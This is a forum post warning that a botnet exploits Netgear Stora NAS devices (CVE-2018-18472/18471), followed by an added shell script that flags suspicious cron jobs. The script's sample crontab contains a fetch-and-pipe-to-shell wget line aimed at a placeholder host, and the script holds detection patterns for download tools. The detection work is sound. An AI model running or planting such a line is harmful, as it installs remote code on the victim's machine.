Houston, we have a problem: vulnerabilities for Netgear Stora (CVE-2018-18472 and CVE-2018-18471)
Like I said in my last message, I was worried about how this malware got there.
Look at this: https://www.wizcase.com/blog/hack-2018/ A major vulnerability was reported in October 2018 affecting our Stora and other NAS devices.
Just know that something is now running on your NAS as root, so it has access to every file on your NAS (read, delete, etc.), can upload them somewhere, and can use the NAS as a jumping-off point to attack other devices on your network. It can also be used by the hacker to DDoS some site, etc. Every 15 minutes it calls home and checks for instructions.
I don't know if a reset of the device would remove the botnet. I deactivated it myself on my NAS, but I'm experienced with Linux and I'm just monitoring to see if it comes back. I've removed the piece of software and disabled the scheduled job that would call home and re-install it.
I hope HipServ / Netgear will do something, but this device is legacy stuff now. I don't think we should hold our breath; time to look for another device, I guess.
This is serious. Basically, you can sum it up like this:
- If you are using one of the above devices and they are connected on the WAN, make sure to remove your device from the internet. (Make sure they are running only locally in a safe network.)
- Make sure to contact the affected vendors and insist they release a patch as soon as possible!
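
The post mentions a scheduled job that calls home every 15 minutes. As an added example (not part of the original post, and not vendor code), the shell function below scans crontab text for entries with that cadence or with a download command so they can be reviewed by hand. It assumes the scheduled job is a cron entry; the function names and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the post). Assumption: the scheduled job is a cron entry.

# sample_crontab: constructed crontab lines, not taken from an infected device.
sample_crontab() {
cat <<'EOF'
# constructed sample
SHELL=/bin/sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/15 * * * * wget -q -O - http://example.invalid/update.sh | sh
30 2 * * 0 rsync -a /home/ /backup/
0,15,30,45 * * * * /tmp/.helper >/dev/null 2>&1
EOF
}

# audit_cron [FILE...]: read crontab text (stdin if no files) and print
# "source:line: reasons: entry" for each entry worth a manual look.
audit_cron() {
    awk '
        function add(r, tag) { return (r == "" ? tag : r "," tag) }
        /^[ \t]*(#|$)/ { next }                          # comments, blank lines
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }  # VAR=value settings
        {
            why = ""
            # Minute field that fires four times an hour.
            if ($1 == "*/15" || $1 == "0,15,30,45") why = add(why, "every-15-min")
            # Command invokes a download tool.
            if ($0 ~ "(^|[ \t/;|&])(wget|curl|tftp)[ \t]") why = add(why, "network-fetch")
            # Download piped straight into a shell.
            if ($0 ~ "(wget|curl)[^|]*[|][ \t]*(ba)?sh([ \t]|$)") why = add(why, "pipe-to-shell")
            src = (FILENAME == "" || FILENAME == "-") ? "stdin" : FILENAME
            if (why != "") printf "%s:%d: %s: %s\n", src, FNR, why, $0
        }
    ' "$@"
}

# Demo on the constructed sample; on a real box pass the crontab files instead.
sample_crontab | audit_cron
```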